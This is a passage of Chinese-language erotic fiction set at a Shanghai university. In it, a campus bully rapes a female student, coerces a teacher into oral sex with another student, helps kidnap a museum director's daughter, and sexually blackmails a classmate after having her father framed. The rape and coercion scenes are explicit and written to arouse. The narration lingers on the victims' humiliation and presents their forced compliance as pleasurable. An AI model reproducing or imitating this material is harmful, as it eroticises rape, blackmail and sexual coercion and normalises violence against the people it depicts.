      江龍向手下使了個眼色,兩人會意,各使力氣將肖揚轉過身,然后一踢她的后膝,肖揚便被迫跪倒在地上,然后按下肖揚的頭,這樣,肖揚的裸露的屁股就被迫高高地撅了起來,她一直夾緊玉腿想保護的那胯間的粉紅色的肉縫和菊花蕾也都無奈地張了開來。

      “江龍,你是畜生!”被弄成如此羞恥姿勢的肖揚羞憤欲死,淚水終于從她美麗的眼睛里奪眶而出。

      “哈哈哈,打得那小子跪地痛哭!”李柯說道。

      “對!讓那小子跪地求饒!”李浩躊躇滿志地說。他哪里知道,此刻自己心愛的女友肖揚卻跪在“那小子”面前,把她最神圣隱秘的羞處毫無遮掩地露給了他看。那里就連他都沒有看到過,肖揚最多只在夏天她穿迷你短裙的時候讓他把手伸進她的內褲里去過。

      “畜生!”肖揚含淚嬌叱。

      江龍的兩個手下跟隨江龍多年,許多事早就駕輕就熟,兩人將肖揚按倒在地上,分別在兩邊,各用一手將肖揚的玉手扯開,又各用一手捉住肖揚的腳踝,將肖揚兩條長腿分成超過120度。

      江龍淫笑著,趴在肖揚分開的兩腿間︰“怎么樣,肖揚小姐,現在有什么感想,即將被自己男朋友的敵人強奸?”

      “不要,求你了,啊……??!”肖揚絕望地叫,因為江龍已經伸手逗弄她的兩顆粉紅色的乳頭。

      肖揚咬緊嘴唇,無奈地任由江龍玩弄她的身體,不一會兒,她的乳頭便硬了起來,可憐她只被李浩撫摸而硬起來過的乳頭,竟然今天被這個惡棍弄得硬了起來。江龍于是兩手下行,探入肖揚的胯間,撥開了她的兩片陰唇,又開始老練地逗弄她的陰蒂。

      肖揚自然對眼前這個校園惡少討厭之極,可她畢竟是個21歲的青春少女,被江龍這么有經驗的老手逗弄她最敏感的地方,還是不可避免地產生了一種生理上的快感。

      “不,不!”肖揚絕望地喊,可是那花瓣里還是不爭氣地流出了蜜汁。

      這正是江龍期待的︰“要是李浩知道他心愛的女友被我搞硬了乳頭,搞出了蜜汁,不知道會氣成什么樣子!哈哈哈哈!”

      兩個打手也在旁邊陪著干笑。

      江龍拉開褲子拉鏈,終于掏出已經堅挺的粗大無比的肉棒。他用兩個大拇指將肖揚的肉縫撐到最圓,然后將大雞巴捅了進去。

      “浩,救我……”肖揚淚流滿面,終于絕望地喊著李浩的名字︰“啊……啊……啊……啊……”

      江龍帶著無比的滿足,將他碩大的陰莖插入了肖揚處女的陰道的深處……

      “那混蛋如果想進步一些的話,”李浩對李柯說︰“應該去練連腰腹力量,這樣才能做好空中動作……”

      江龍使出“腰腹力量”極爽地在肖揚緊繃的處女的陰道里抽插,終于被辱,還被奪去了處女貞潔的肖揚羞憤欲死,加上是第一次,疼痛異常,所以立刻神智模糊,幾乎昏去。

      江龍狂干猛插了約十多分鐘,終于感到一陣極度的快感襲來,他將大雞巴拔出,迅速跨騎到肖揚的胸口,將神志模糊的肖揚的櫻桃小嘴扒開,把雞巴捅了進去。

      “啊……啊……啊……”隨著一陣快樂的號叫和抽搐,校園惡少江龍將一股污濁的精液全部射入了學校無數男生夢中情人的美少女肖揚的嘴巴里。肖揚在迷糊中感到一股灼熱的液體直沖喉嚨,她無奈地喝了下去,喉間痛苦地發出了“咕咚咕咚”的聲音。

      “咕咚咕咚”李浩滿意地一口氣將一杯西柚汁喝下。

      “肖揚怎么去了這么久,有半個小時了吧?”梁婉儀道。

      “應該不會有事吧?”李浩說。

      “我去洗手間看看吧!”梁婉儀起身。

      就在這時,面色蒼白的肖揚走了進來。酒吧里的男生照例貪婪地目送,他們當中有的人發現肖揚的長腿似乎沒有出去時擺動得那么優雅自然,當然他們并不會想到是因為眼前這個嬌美的玉人剛剛被個惡少破了處女之身的緣故。

      “你臉色不好,沒事吧?”李浩關切地問。

      “沒……沒什么?!毙P勉強地一笑,說。

      李浩料想是什么婦科病癥,也不好多問,梁婉儀應該會去關心的。

      “那我們早點回去吧!”梁婉儀挽住肖揚道。

      李浩點點頭。

      四人于是結了帳,離開了“野人”酒吧。

      李浩將肖揚和梁婉儀送到了寢室門口,便自己回了寢室,他并沒有注意到李柯并沒有回他的寢室。

      第三回 更大的陰謀

      晚上十點半,學生社團中心大樓依然亮著燈,七樓放映廳里,江龍和他的手下坐在那里,江龍依然回味著剛才奸污肖揚的美妙感覺。

      門開了,李柯領著一個中年男人走了進來,江龍站了起來。

      “這位王先生是山本先生最信任的人?!崩羁掠懞玫叵蚪埥榻B。

      江龍點點頭,和王先生握了握手以后坐下。

      “我馬上就走,所以就開門見山吧!”王先生用一種刺耳的聲音說道︰“山本一郎先生是日本昌永財團董事長山本村正先生的獨子,對中國的古董文物一直非常感興趣。他在陜西和北京等地與許多中國朋友都合作得很好,現在山本先生對上海博物館現藏的大禹權杖這件古董非常感興趣,希望能夠得到。山本先生了解到,上海博物館館長的千金徐倩小姐就在上二大讀書,聽說江龍先生對小妞挺有辦法……”王先生說到這里干笑了一聲。

      “承蒙山本先生夸獎,”江龍也干笑了幾聲道︰“請王先生轉告山本先生,他的意思我懂了,我會全力去辦的!”

      “好,不愧是明白人!”王先生怪叫道︰“事成之后,山本先生不會虧待你們的!”

      王先生說完便起身告辭,江龍送至門口。

      “這個徐倩,是不是也是上二大的四大美女之一???”王先生走后江龍問李柯。

      李柯點點頭︰“她是我的同班同學,還是我們學校有名的‘青春勁舞’組合的成員之一,身材極棒,舞跳得更好?!崩羁抡f得眉飛色舞。

      “他媽的,你是不是每天晚上想著她手淫???”江龍嘲諷地說。

      “有……有時是?!崩羁骡嵉爻姓J。

      “有時是,那別的時候呢?”

      “別的時候,嗯,有時想著肖揚,有時想著梁婉儀……”

      “哈哈哈哈……”江龍狂笑︰“剛才李浩覺察到了什么沒有?”

      李柯搖頭。

      “哈哈哈哈,蠢貨,老婆被我搞了都不知道,還跟我斗!”江龍無限滿足地大笑︰“對了,酒吧里還有個女孩就是梁婉儀吧?”

      李柯點頭。

      “漂亮,真他媽的漂亮!老子一定要把她弄到手!”

      “這妞可傲了,學校里追她的人有無數,可是她一個都看不上,他老爸有的是錢……”

      “嘿嘿,我就喜歡搞高傲的美女?!苯埩髦谒f。

      “對了,老大,你昨天跟我說的事……”李柯露出丑陋的淫笑。

      “瞧你這臭小子,急什么,馬上讓你小子爽?!苯埖?。李柯露出迫不及待的表情。

      學生社團中心關門的時間是十一點,每晚都由某個院系的輔導員來最后監督檢查。今天有許多男生都賴在臺球室、舞廳、野人酒吧等地方遲遲不走,因為今天來監督檢查的是文學院的輔導員兼任校團委副書記的林維維老師。

      林老師今年25歲,是文學院剛剛畢業的研究生。她的本科就是在上二大讀的,當時是上二大出了名的?;?,現在不僅美貌依舊,更加多了幾分成熟女人的誘人風姿,令上二大老師學生全都垂涎不已。

      十一點整,身高1米70、修長苗條的林維維老師準時來到社團中心。她沒有讓等在那里的饑渴的男學生失望,她穿了一套黑色的緊身套裙,美腿上穿著黑色的長絲襪,顯得無比撩人。她邁著舞姿般的步伐在中心指揮學生干部做最后的檢查,然后用嬌美迷人的嗓音催促那些不離去、色迷迷看著她的學生回寢室。

      終于,全部學生都戀戀不舍地走了,林維維老師檢查了各個單元的門后卻并沒有像往常那樣鎖了大門離去,而是坐上電梯到了7樓。

      她翩翩地走進放映廳,見到了江龍和他的手下。剛才在學生面前高高在上的林老師,站在大一的江龍面前卻突然變得順從和羞澀。

      “你……快一點?!彼p聲說。

      “這你得跟他說?!苯堉噶酥咐羁?。

      林維維老師這才注意到李柯的存在,她立刻漲紅了臉︰“他……是我們學校的學生嗎?”

      江龍點頭。

      “不……不行?!绷志S維老師哀求。

      “林老師,你忘了你沒有選擇的機會,”江龍冷冷道︰“我讓你伺候誰,你就得伺候誰?!?br>
      林維維老師站在那里,羞得滿臉通紅,她猶豫了片刻,終于順從地走到1米65的矮小猥瑣的李柯面前,跪了下來。李柯立刻聞到林老師身上散發出來的一股芳香,令他無比興奮。他看著自己一直只能在夢里想像的美麗女老師竟然真的跪在自己面前,幾乎要暈過去。

      林維維老師伸出白嫩的手,拉開了李柯骯臟的褲子的拉鏈。林老師的溫熱的手摸到李柯那個硬挺的物件,將之掏出來的時候,李柯渾身一抖。

      “林老師,你真的肯舔我的雞巴!喔,太好了!”李柯興奮地歡叫著︰“林老師,我經常在晚上睡覺前想像著搞你的情景,沒想到你真的……哈哈哈哈……啊啊……啊啊……”李柯突然狂叫起來,原來美麗的女老師已經用她的嘴含住了李柯的肉棒。

      林維維老師聞到一股濃重的尿味,幾乎嘔吐,可她還是順從地伸出舌頭,舔舐李柯骯臟的性器。

      梁婉儀從上鋪下來,坐到肖揚的床上,淚流滿面的肖揚轉頭朝向墻壁。

      “發生了什么事?”梁婉儀柔聲問。

      “啊……啊……林老師,我要看你的裸體,啊……啊……啊……”李柯爽得直嚎。

      林維維老師含著李柯的雞巴,轉頭看了看江龍,“按他說的做!”江龍冷冷道。林維維老師無奈地一邊叼著李柯的陰莖,一邊脫下自己的套裙。

      “啊……林老師……你的身體好美,啊……啊……你的乳房真大,啊……啊……喔……爽死了,林老師你的美腿真長……”

      林維維老師順從地裸了玉體,一絲不掛地替一個學生口交。

      “我要搞老師,我要強奸老師!”

      “什么!你被他強奸了?!”女生寢室的走廊里,梁婉儀輕聲驚叫。

      肖揚痛苦地點點頭。

      “爽死啦!”李柯伸出手撥弄著林維維老師飄逸的長發和她精巧可人的小耳朵。為了早點結束的美麗女老師,賣力地吸吮著李柯的性器,發出“嘖嘖”的聲音。突然李柯大叫一聲,一股精液終于泄到了美麗女老師的嘴里。

      “什么!他還……畜生!”梁婉儀罵道。

      “我也不知道,醒來后,滿嘴都是男人的那東西?!毙P泣不成聲︰“千萬不能讓李浩知道啊……”

      “畜生!”梁婉儀抱住肖揚︰“一定不讓這個混蛋有好日子過!”

      林維維老師羞澀地穿上美麗的套裙,李柯躺在地上,臉上定格著爽到極點的呆滯表情,嘴里喃喃道︰“林老師吮了我的雞巴,林老師吮了我的雞巴……”

      第四回 輸給強奸了自己女朋友的惡少

      周日是一個秋高氣爽的日子。下午一點半,上海第二大學無數的同學已經聚集在東區體育館里。因為今天在這里將有一場李浩對江龍的籃球單挑,比賽是半場,先進10個球者為勝,擔任裁判的是校體育組的陳教練。

      江龍已經站在了場內,頗為賣弄地進行著練習,而李浩卻還沒有到。

      學校的“梅園”里,李浩和肖揚正穿過小徑向體育館走去。

      李浩默默走在肖揚的身后,他望著美麗修長的女友,數次欲言又止,終于,他下了決心,問道︰“揚,剛才我碰到江龍那個混蛋,他他媽的說了些污辱你的話,要不是就在校長室旁邊,我真想揍他!”李浩說。

      肖揚默默不語,繼續走著。李浩心中一沉。

      “他說他……欺負了你,”李浩說︰“楊,沒這回事吧?”

      “當……當然沒這回事,”肖揚躲閃著說。

      李浩看出了肖揚的猶豫,“揚,你告訴我實話,揚!”李浩追問。

      “浩!”肖揚終于忍不住淚水奪眶而出,撲到了李浩的懷里︰“那畜生強奸了我……”

      “什么!那……那畜生怎么會……欺負你的?!”李浩顫抖地說。

      “那天在社團中心,我去洗手間,他的手下把我劫持到電影廳……他把我的衣褲脫光,看我的身體,還奸污了我……”

      “畜生!”李浩聲嘶力竭地怒嚎。

      “他還把那東西插到我嘴里……”肖揚泣不成聲。

      “我殺了他!”李浩大叫。

      “浩,別亂來!”肖揚拉住他。

      “我們去告他,讓他坐牢!”

      “他,家里很有勢力的,浩,我不要別人知道這事,浩,求你了,別讓別人知道……”

      望著嬌美動人,楚楚可憐的肖揚,李浩抱住她痛苦地點頭……


      人群轟動了,李浩終于出現在了體育館里。

      梁婉儀是第一個注意到李浩反常的,別的人也很快發現了。

      “沒這么夸張吧,一場比賽,他好像要殺人似的?!庇腥俗h論。

      李浩鐵青著臉走到江龍面前,江龍得意無比地朝他示威地笑。

      裁判一聲哨響,球拋向空中。

      觀眾們立刻失望了。李浩打得那是什么球啊,太臭了,簡直和平時是判若兩人。

      他們哪里知道,李浩一看到江龍那張牙舞爪運球,跳躍的樣子,就想到這個畜生曾經剝下他心愛的女朋友的衣褲,貪婪地觀賞她的羞處,肆意地摸弄她的生殖器官……天啊,這是多么讓人心痛的事??!肖揚這么楚楚動人,純潔美麗的少女,竟然被眼前這個惡少污辱了!李浩拚命想將腦中的這些念頭驅除,可是他做不到,他不可遏制地想著江龍用他骯臟的手沿著肖揚白晰的腿剝下她的緊身牛仔褲的鏡頭、江龍將他粗大的性器插入肖揚處女的陰道的鏡頭……

      十分鐘后,李浩輸了個0︰10。觀眾哄笑著搖頭散去,不少人竟然開始稱江龍為“上二大新球王”了。

      江龍看著緊握雙手的李浩,輕聲說︰“我插進她那里的時候,她還叫你的名字呢!”

      “畜生!”李浩號叫著憤怒地沖過去揍江龍。江龍馬上抱著頭逃開,許多人拉開李浩。

      “輸了球不必打人嘛!”更有人輕蔑地說︰“這么輸不起,真丟人!”

      “畜生!我殺了你!”李浩掙扎著朝著站在一邊微笑的江龍怒吼,直到嗓子沙啞,昏死過去。

      江龍滿意地看著昏厥過去的李浩被人抬走,突然聽見背后一個嬌美動聽的聲音響起︰“你別得意,有種的再跟我比比!”

      江龍回頭,只見一個穿著短裙的修長美少女亭亭玉立,正是梁婉儀。

      “哈哈哈哈!”江龍大笑︰“梁小姐這么纖美溫柔的姑娘也會打籃球?”

      “誰說籃球了,你敢跟我比網球嘛?”梁婉儀道。

      “行行行,跟梁小姐這樣的美人比什么都行!”江龍望著貌美絕倫,氣質萬千的梁婉儀口水都要流出來了。

      “那跟我來?!绷和駜x說完轉身就走,江龍貪婪地望著梁婉儀露在短裙外的美腿,連忙跟上。

      梁婉儀突然停下道︰“我看著那兩人討厭,別讓他們跟來?!?br>
      江龍哪會放過這么個同梁婉儀接觸的機會,道︰“你們回去吧!”兩個打手離去。

      梁婉儀邁開雙腿,優雅萬千地走出體育館,江龍緊緊跟隨,目光不離梁婉儀的下半身,那短裙隨著梁婉儀的步伐微微搖擺,幾乎要露出大腿的根處,卻又實際上什么都看不到。江龍恨不得鉆到梁婉儀的裙子里去。

      江龍跟著梁婉儀不知不覺走到了舊食堂的后面,那里什么人都沒有。江龍發覺不對時,已經從不知道哪里閃出了兩個大漢,二話不說就朝江龍招呼。江龍狼狽鼠竄,還是被打得哇哇大叫。

      “畜生,罪有應得!”梁婉儀嬌叱。

      “梁小姐饒命,我不敢了!”江龍大叫。

      “呸,叫你欺負肖揚,狠狠揍他!”

      兩個大漢拳如雨點,江龍頓時鼻血橫流。

      “饒命啊,饒命??!”江龍號叫。

      “有人來了!”其中一個大漢說。

      “走吧!”梁婉儀道。她塞了一把錢到二人手里,兩人便迅速離去,梁婉儀也離開。

      江龍從地上爬起來,抹了一把嘴角和鼻孔旁的鮮血,惡狠狠地望著梁婉儀俏麗的背影道︰“臭妞,別落到我手里!”

      第五回 美麗的警花

      晚上八點,上海第二大學學生活動中心一樓的多功能廳里燈火通明。在強勁的音樂的伴奏下,三個有著魔鬼身材的高挑少女正在跳著現代舞。臺下,有幾個人正在觀看。隨著音樂嘎然而止,三個少女來了個漂亮的造型結束了舞蹈,臺下響起了掌聲。

      “真不愧是‘青春勁舞組合’,這次在學校文化節上表演一定又會引起轟動的!”說話的男生是校學生會副主席陳卓。

      “中間的那個動作是不是有點不連貫?”站在陳卓旁邊一個穿著短裙,極美麗的少女說。她是校文藝部長上官敏。

      “是這樣的,我們有一個動作還在設計中,所以剛才沒跳出來。待會兒我們跟婉儀一起商量一下?!迸_上一個同樣高挑迷人的女孩從臺上跳下來說。她是徐倩。

      “對了,這次多虧你爸爸贊助我們的活動?!标愖繉φ驹谏瞎倜羯磉叺牧和駜x道。他說出這話有點后悔,因為這明顯是沒話找話。本來今天的排練他是沒必要到場的,他來,其實只是聽說梁婉儀會來而已。

      梁婉儀沖他溫柔地一笑。陳卓一直追求她對她來說已經不是秘密了,但是追求者可以裝幾車廂的梁婉儀似乎還沒對誰找到感覺。

      這時候,李柯從舞臺旁邊的音響控制室里走出來,道︰“今天要是肖揚也來了,那我們上二大的四大美女可就到齊了!”

      大家也才發現今天難得是美女云集。梁婉儀,徐倩,上官敏三個美女相視一笑。

      這時廳后的門推開,走進來兩個人。一個是校團委副書記林維維老師,另一個卻是江龍。

      大家看到江龍,都有些反感,大家都對這個惡少挺不屑。梁婉儀則因為他強奸了自己的好朋友則更加鄙視他。雖然自己雇人教訓了他,但是卻又怎能彌補肖揚身心受到的傷害呢?

      江龍掃了一眼廳內的人,心道怎么我想玩而沒玩到手的小妞今天都來了。上二大鼎鼎有名,才貌雙全的上官敏果然名不虛傳,剛跳完舞的徐倩高聳的胸部正一起一伏,而梁婉儀則盯著他臉上的傷痕得意地冷笑,她那種高傲又嬌美的神情撩撥得江龍恨不能馬上就剝光了她搞得她嗷嗷嬌叫。

      “臭妞,你先得意吧,總有一天落到我手里!”他暗暗說。

      林維維老師則立刻面紅耳赤,因為她看見李柯正沖她得意地淫笑。她想起那晚在七樓替他口交,又裸了身體給他看的羞人情景。

      “這位是江龍同學,他現在已經加入了我們團委工作,他中學里也是文藝骨干,所以這次文化節,就由他代表團委和學生會合作主持吧!”林維維老師說︰“希望大家配合江龍同學搞好工作?!?br>
      陳卓,上官敏當然反對,大家都明白,校學生會歷來是在校團委的直接領導下的,這次團委竟然派江龍為代表,實際上就是要江龍來負責。他們都得聽江龍的,這他們當然不福氣,可是他們知道林維維只是團委里普通的老師,這并不是她的意見,一定因為江龍是校長的侄子,所以團委想巴結他??墒撬麄冇侄紵o法公開反對,所以只有沉默不語。

      林維維老師說完便離開,她實在不想見到那個猥瑣矮小的男生的淫蕩目光。李柯見林老師離去,忙問︰“今天的排練結束了吧?”

      “我們還要討論一下,不過用不著音響了?!鄙瞎倜舻?。

      “你可以回去了!”江龍道,他知道李柯的心思。李柯大喜,立刻沖出了多功能廳,去追林維維老師。

      陳卓,上官敏看到江龍一副發號施令的樣子都很厭惡,梁婉儀更是氣憤。

      “好,我們討論一下晚會的事吧!”江龍說。

      “我還有事,先走了?!绷和駜x冷冷地說道。

      “我還要去宣傳部開個會,我也走了?!标愖康?。

      “既然這樣,今天就散會吧!”上官敏說完理了東西也離開。江龍目送著三人離開咬牙切齒。

      徐倩她們三個聽見上官敏的話,也準備理東西走人。江龍只有尷尬地說道︰“那……今天就到這里,你們三人誰主跳?”

      兩人一指徐倩,“那你留一下?!苯堈f。

      徐倩不是學生會干部,也不知江龍底細,自然不像梁婉儀她們那么不給江龍面子,于是留下。

      “你們還缺少什么道具嗎?”江龍問。

      “嗯,我們想換個伴奏音樂,想用個前衛點的音樂,卻找不到合適的,我們本來就沒什么這方面的磁帶?!毙熨徽f。

      “我有,我有,”江龍忙說︰“我教室里有許多前衛音樂的磁帶,你跟我去拿吧?!?br>
      徐倩哪里知道有陰謀,欣然同意。他們走出多功能廳,路過道具室時,聽到里面似乎有聲音,江龍暗暗一笑。徐倩也沒多想,她哪里料得到,里面林維維老師正在替李柯口交!

      江龍故意帶著徐倩走近路。那是過學校舊食堂的那條路,也就是梁婉儀派人揍他的那個地方。

      那里十分僻靜,幾乎沒有人在那里。

      兩人走到那里時,突然竄出兩個面人撲向徐倩。

      “??!”江龍馬上假裝被打倒,兩人往徐倩嘴里塞上毛巾,便準備架走。徐倩一個嬌弱女孩,自然沒得反抗。正在這時,突然沖出一個俏麗矯健的身影,連續兩個踢腿準確地踢開了兩個面人,面人立刻反擊。江龍一驚,隨即拉起徐倩道︰“快跑!”

      徐倩早嚇得不會思考了,跟著江龍就跑,根本不辨方向,不知不覺跑到校園西面的圍墻處,突然一只麻袋罩了過來……

      舊食堂處,矯健的身影獨斗兩個面人,卻仍占了上風。兩個面人相互一看,便準備逃走。這時,十幾名警察從四面出現,立刻捉住了兩個面人。

      警察們將面人帶到路燈下,扯下他們的黑布,露出兩個日本人的臉。

      “陳警官,正是西村和小林!”警察們報告。

      剛才那個俏麗的身影走了過來,竟然是個極美麗的女警官。

      “西村,小林,我們又見面了!”女警官說。

      “是……你,又是你?!蔽鞔孱澏吨f。

      這位美麗苗條的女警叫陳茹,是北京的警官,以優異的成績畢業于中國警官大學。雖然今天只有24歲,卻連破大案,令犯罪份子聞風喪膽。加上她貌美如花,一直是警界里的嬌女。她追蹤山本走私集團已經三年,多次阻止了他們偷運國寶,可是因為山本有日本財閥的支持,加上一直無法找到直接證據,所以始終無法將他們逮捕。這次,她得到可靠線報,說山本他們要對上海博物館的文物下手,所以她就追蹤到了上海。

      “報告陳警官,那個女孩不見了!”

      “什么?”


      上海一套豪華別墅的地下室里,站著三個男人。地上,躺著一個手腳都被麻繩捆起來的美麗少女,她正是上海博物館長的女兒徐倩。

      三個男人是山本一郎,王先生和江龍。

      “這次多虧了江先生機智??!”久居中國的山本操著流利的中文道。

      “哪里哪里!”江龍客氣︰“不是山本先生的兩位朋友會有什么麻煩?”

      “不要緊,我們只要不讓他們找到這個女孩,他們就沒有證據的?!鄙奖菊f道。

      “那個美麗的女警察是什么樣的來頭?她后來把我叫去盤問,看得出,她很干練?!苯埖?。

      山本臉上露出冷笑︰“不錯,她比你想像得還要干練。她是我在全世界遇到的最大的對手。她的父親也是警察,死在我手里,所以她一直想抓住我,替她父親報仇!”

      “原來是這樣!”江龍說。

      “不過這次她還是被江先生你的機智挫敗了,你讓我很滿意,你要什么我都會給你的,你要多少錢?”山本問。

      “山本先生,我不要錢,我有個請求,不過可能山本先生……”江龍故作猶

      “你說吧,我一定做到?!鄙奖拘Φ?。

      “山本先生的令尊是日本昌永財團的董事長吧?”江龍問。

      “沒錯!”王先生道。

      “我想請你除掉一個人,就是你們昌永財團的上海中方總經理梁益民!”江龍道。

      “噢,那家伙,我也不喜歡,他總是維護本地的職員的利益,不過不知他和江先生有什么冤仇?”山本問。

      “我和他倒沒有冤仇,不過我和他女兒卻頗有些過節?!苯埖?。

      “他女兒?”山本會心地一笑︰“我倒是聽說他有一個如花似玉的女兒……嘿嘿,好像還曾給我們公司做過廣告少女吧?”

      “沒錯,他拍廣告時十八歲,現在應該有二十一了吧,”王王先生附和道︰“應該更加嫵媚了!”

      江龍訕笑著點頭。

      “好,我答應你!”山本道。

      “多謝山本先生!”

      三個男人在地下室爆發出心的笑聲。

      第六回 梁婉儀低下高傲的頭顱

      秋風蕭瑟。

      在上海第二大學的校園小徑里,匆匆走著一個穿短裙的美麗修長的少女。她純美的臉上帶著無盡的哀愁。她就是上二大四大美少女之一的梁婉儀。

      過路的男生留戀地回望她俏麗的背影,然后低頭議論︰“喂,你們知道嗎,她爸被公安局抓起來了,聽說是貪污,還是日本公司內部的人告發的呢!”

      梁婉儀昨天剛去拘留所探望過已經五十出頭的父親。受了沉重打擊的父親就像變了個人,幾乎有些癡呆了,只是一個勁說自己是冤枉的。這景像令梁婉儀潸然淚下。

      梁婉儀走出校園,走進了學校旁邊一幢豪華的高層住宅樓里。她乘電梯到了二十一樓,來到2101房間門口。她猶豫了一下,想轉身離去,可是眼前又浮現出了父親年邁憔悴的面容。她深吸了一口氣,像是下了決心,按響了門鈴。

      門開了,她看見了令她心的江龍的臉。

      “梁小姐終于來了,讓我好等?!苯堁陲棽蛔∠矏倢⒘和駜x讓進屋里。

      “很高興梁小姐按我說的穿了那么性感的衣服?!苯垵M意地看著穿著短裙美腿畢現的梁婉儀。梁婉儀一言不發,卻依然保持著她那高傲的神情。

      “那么我其他的要求,梁小姐考慮得怎么樣了?”

      梁婉儀跟著江龍走進他的臥室里,她咬著嘴唇,明顯帶著無比的屈辱,輕輕點點頭。

      江龍得意地看著梁婉儀的樣子。她點頭的時候是那么的羞澀,那么的無可奈何。對于一個像梁婉儀那么高傲的少女來說,這樣的表情絕對給人帶來滿足感。

      “咦,梁小姐怎么這會兒這么羞澀啦!那天打我的時候的高傲的表情到哪里去啦?”江龍故意問道。

      梁婉儀已經做好了被江龍羞辱的準備,她雖然羞憤,卻只有默不作聲。

      “梁小姐,你已知道令尊是我一手陷害的嘍?他現在在監獄里過得怎么樣?唉,這么把年紀的人了……”

      梁婉儀仍不語。

      “唉,他一定因為被人陷害而憤憤不平吧?要是他知道他的如花似玉的寶貝女兒現在竟然馬上就要被陷害他的人玩弄,不知是什么心情?”江龍惡笑著說。

      “你是畜生!”梁婉儀終于忍不住嬌叱。

      “嗯,和我搞肖揚的時候她罵得一樣,不知梁小姐的玉體和肖揚小姐比哪個更撩人呀?這世上目前大概也只有我有機會做個比較了吧?”

      “你不會有好結果的!”梁婉儀強忍住屈辱的淚水,咬著嘴唇罵道。

      “梁小姐,根據我們的約定,你好像不應該這么跟我說話的,是不是?”江龍得意地說︰“如果你真想救你的老父親的話?!?br>
      梁婉儀再次深深吸了口氣,她知道,無論江龍怎么羞辱她,她只有忍受,為了可憐的父親。于是她咬緊嘴唇,下了最后的決心,道︰“只許你……看我,不許碰我……你敢碰我一下,我……殺了你?!?br>
      “哈哈哈哈!”江龍笑道︰“梁小姐放心,我會遵守我的諾言,只不過也請梁小姐也要按我的要求說話和行動哦!我要求你說的那些話你都記熟了嗎?”

      “記……記熟了!”梁婉儀輕聲說。江龍看著梁婉儀這種明明正受著污辱卻仍然竭力保持高傲的樣子感到無比滿足。

      “很好!”江龍滿意地道︰“那么梁小姐,你被一個陷害你父親的人玩弄,你是什么感覺???”

      梁婉儀閉上美目,羞澀地輕輕道︰“我……很喜歡!”梁婉儀說完這話,立刻羞憤欲死。應該說,讓她這么高傲的少女說出這么樣的話比死還難受。

      “是嗎?”江龍故做驚訝狀,道︰“又美麗又高傲的梁婉儀小姐竟然喜歡被我玩弄?”

      “是的,我喜歡讓你……讓你……讓你……搞我?!绷和駜x竭力克制羞憤說了出來︰“因為……其實……我一直暗暗喜歡你?!绷和駜x說完這句,羞得滿臉通紅,就好像已經在江龍面前赤身裸體了一樣。

      像她這樣的少女,從十幾歲起,就一直被周圍的男孩子當成公主,能被她多看一眼也是榮幸,而她從來就不屑于對哪個男孩子表示好感,可是此刻卻讓她屈尊對一個男孩說出示愛的話,這簡直太羞辱了。

      江龍享受著這一切。他慶幸自己做了一個極端正確的決定。在梁婉儀來找他談救她父親的條件時,開始他極力要求梁婉儀答應同他性交。這也很自然,因為能夠同梁婉儀這個大美女性交恐怕是每個男人的欲望??墒橇和駜x死都不肯,江龍看出梁婉儀怎么都不會讓他蹂躪她的貞操,因此采取了別的策略。他便同意不碰梁婉儀的身體,但梁婉儀必須依照他的要求做任何動作,包括脫光衣褲,還必須按照他的要求說他為她編好的臺詞,期限是一個禮拜。

      梁婉儀最初也堅決不肯脫衣服,可是她其實也明白,如果不讓這個惡少大大地占一下自己的便宜的話,他說什么也不會答應放過她父親的。所以最后為了她父親她只有屈辱地答應了江龍的要求。兩天后,江龍給了她他寫好的第一天的臺詞。梁婉儀這才發現,其實讓她說那些羞澀的話似乎和讓她脫衣服同樣地難以忍受。

      而江龍雖然暫時失去了給這個美少女破身的好機會,但是他今天發現,污辱梁婉儀這樣一個的高傲少女,慢慢污辱她的自尊,享受她的屈辱,她的羞澀,她的憤怒卻又無可奈何的樣子也許比把她按在床上,扒開兩腿,捅她的小洞來得更加有滿足感。最重要的是,要干她遲早都有機會,最后不行甚至可以強奸她,反正他在公安局也有關系。但是這樣的羞辱卻非得要她自才行,所以必須利用這個千載難逢的脅迫她的機會。

      “是嗎?你不是一個十分高傲的女孩子嗎,也會暗暗喜歡別人嗎?”江龍坐到沙發上翹起二郎腿,看著婷婷站著的梁婉儀。她羞澀的面容還真像個在心上人面前表白的情竇初開的少女。

      “我是很高傲,可是因為你……實在太有魅力,讓我……情不自禁喜歡上了你。再高傲的女孩子也會被……征服的?!?br>
      “那你為什么派人打我???”

      “是……是因為我暗戀你,你卻……總是不理我……”

      “這么說,你處處同我作對,原來是由愛生恨嘍?”

      “不是,我一直……一直……愛你的?!绷和駜x只感到無盡的羞恥感向她襲來,可是她卻一點辦法也沒有。

      “是嗎?那我強奸了你的好朋友肖揚,你也不恨我?”

      聽了這話,梁婉儀羞憤難當,站在那里臉漲得通紅。

      “怎么了,想前功盡棄?”江龍冷冷道。

      “是?!绷和駜x終于屈服︰“我……不恨你。實際上……我很妒忌肖揚……因為……你……你……摸過她的……她的……”梁婉儀實在難以啟齒。

      江龍滿足地欣賞著梁婉儀的羞辱樣。

      梁婉儀深吸一口氣,終于說︰“因為你摸過她的……奶頭,還插入了她……她的……陰道。我多想你能夠……能夠……畜生!江龍你是畜生!我說不出口,我說不出??!”梁婉儀終于忍不住,淚水奪眶而出。

      “果然是個高傲的小姐,這么點污辱就受不了了,唉,你可憐的老爸不知現在在遭什么罪???”江龍道。梁婉儀站在那里,哭得花枝亂顫。聽到江龍再次的威脅,梁婉儀只有再次鼓起勇氣,收住淚水。

      “我多想你像搞肖揚那樣的……搞我啊?!绷和駜x顫聲說。

      “怎么搞?說具體點!”江龍不耐煩地道。

      “就是……就是摸我的奶頭、插我的陰道!……畜生,你太過份了!你太過份了!”梁婉儀怒叱。

      “哈哈哈哈!”江龍仰天大笑。太讓他滿足了!上二大最美麗高傲的少女梁婉儀竟然站在他的面前談論她自己的奶頭和陰道,這恐怕是上二大所有男生做夢也不敢想的事吧!

      “你這么愛我,為什么不來向我表白呢?”江龍又問。

      “因為……我放不下高傲小姐的架子?!?br>
      “那,我不理你,你是不是很痛苦???”

      “是,我……每日每夜都思念你?!?br>
      “怎么思念???”

      “我每天都盼望著看到你,你出現在我面前的時候我都會心跳加速。見不到你的時候我會偷偷……偷偷……我說不出口,我說不出口!”梁婉儀羞憤至極,眼淚又要流出來。

      “我最后一次警告你,如果你再不按照我們約定的做,你父親就會在監獄里安渡晚年了!”江龍威脅道。

